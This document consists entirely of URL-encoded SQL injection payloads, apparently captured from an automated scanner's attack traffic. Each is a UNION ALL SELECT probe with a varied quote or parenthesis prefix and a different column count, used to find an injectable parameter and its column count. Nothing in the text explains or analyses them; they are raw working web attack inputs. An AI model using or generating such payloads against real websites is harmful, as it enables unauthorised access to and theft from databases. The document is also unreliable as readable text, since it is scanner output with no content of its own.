-9891%27%20UNION%20ALL%20SELECT%208349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%2C8349%23 -3286%27%20UNION%20ALL%20SELECT%202764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%2C2764%23 -2941%27%20UNION%20ALL%20SELECT%208125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%2C8125%23 -6351%27%20UNION%20ALL%20SELECT%207929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%2C7929%23 -9039%27%20UNION%20ALL%20SELECT%206771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%2C6771%23 -8537%22%20UNION%20ALL%20SELECT%203443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%2C3443%23 -4510%22%20UNION%20ALL%20SELECT%207285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%2C7285%23 -8870%22%20UNION%20ALL%20SELECT%205944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%2C5944%23 -4042%22%20UNION%20ALL%20SELECT%201264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%2C1264%23 -9349%22%20UNION%20ALL%20SELECT%203659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%23 -6576%22%20UNION%20ALL%20SELECT%202455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%2C2455%23 -6990%22%20UNION%20ALL%20SELECT%209986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%2C9986%23 -3867%22%20UNION%20ALL%20SELECT%202666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%2C2666%23 -2209%22%20UNION%20ALL%20SELECT%206138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%2C6138%23 -1878%22%20UNION%20ALL%20SELECT%206193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%2C6193%23 -5402%29%20UNION%20ALL%20SELECT%209400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%2C9400%23 -9932%29%20UNION%20ALL%20SELECT%206070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%2C6070%23 -3632%29%20UNION%20ALL%20SELECT%202237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%2C2237%23 -8917%29%20UNION%20ALL%20SELECT%201663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%2C1663%23 -5043%29%20UNION%20ALL%20SELECT%208073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%23 -4180%29%20UNION%20ALL%20SELECT%203055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%23 -6664%29%20UNION%20ALL%20SELECT%209158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%2C9158%23 -8803%29%20UNION%20ALL%20SELECT%202657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%23 -2920%29%20UNION%20ALL%20SELECT%209841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%23 -7587%29%20UNION%20ALL%20SELECT%204170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%23 -1815%29%29%20UNION%20ALL%20SELECT%204252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%2C4252%23 -4731%29%29%20UNION%20ALL%20SELECT%201880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%23 -7968%29%29%20UNION%20ALL%20SELECT%206455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%2C6455%23 -4616%29%29%20UNION%20ALL%20SELECT%204224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%2C4224%23 -3022%29%29%20UNION%20ALL%20SELECT%201247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%2C1247%23 -5961%29%29%20UNION%20ALL%20SELECT%204167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%2C4167%23 -6400%29%29%20UNION%20ALL%20SELECT%208367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%2C8367%23 -6111%29%29%20UNION%20ALL%20SELECT%207849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%2C7849%23 -7834%29%29%20UNION%20ALL%20SELECT%204777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%2C4777%23 -4485%29%29%20UNION%20ALL%20SELECT%202239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%2C2239%23 -2642%29%29%29%20UNION%20ALL%20SELECT%201333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%2C1333%23 -3511%29%29%29%20UNION%20ALL%20SELECT%208684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%2C8684%23 -3112%29%29%29%20UNION%20ALL%20SELECT%203414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%2C3414%23 -5180%29%29%29%20UNION%20ALL%20SELECT%205096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%2C5096%23 -3762%29%29%29%20UNION%20ALL%20SELECT%201039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%2C1039%23 -2539%29%29%29%20UNION%20ALL%20SELECT%206152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%2C6152%23 -8725%29%29%29%20UNION%20ALL%20SELECT%202259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%2C2259%23 -3418%29%29%29%20UNION%20ALL%20SELECT%202824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%2C2824%23 -8906%29%29%29%20UNION%20ALL%20SELECT%204806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%23 -9213%29%29%29%20UNION%20ALL%20SELECT%202680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%2C2680%23 -6247%20UNION%20ALL%20SELECT%208896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%2C8896%23 -6286%20UNION%20ALL%20SELECT%206859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%2C6859%23 -5489%20UNION%20ALL%20SELECT%209042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%2C9042%23 -7260%20UNION%20ALL%20SELECT%204062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%23 -9418%20UNION%20ALL%20SELECT%207458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%2C7458%23 -4159%20UNION%20ALL%20SELECT%203634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%2C3634%23 -6696%20UNION%20ALL%20SELECT%203492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%2C3492%23 -7588%20UNION%20ALL%20SELECT%206975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%2C6975%23 -8975%20UNION%20ALL%20SELECT%208670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%2C8670%23 -3342%20UNION%20ALL%20SELECT%204462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%2C4462%23 -7063%27%29%20UNION%20ALL%20SELECT%204644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%2C4644%23 -5157%27%29%20UNION%20ALL%20SELECT%205339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%23 -3875%27%29%20UNION%20ALL%20SELECT%209515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%2C9515%23 -6733%27%29%20UNION%20ALL%20SELECT%208809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%23 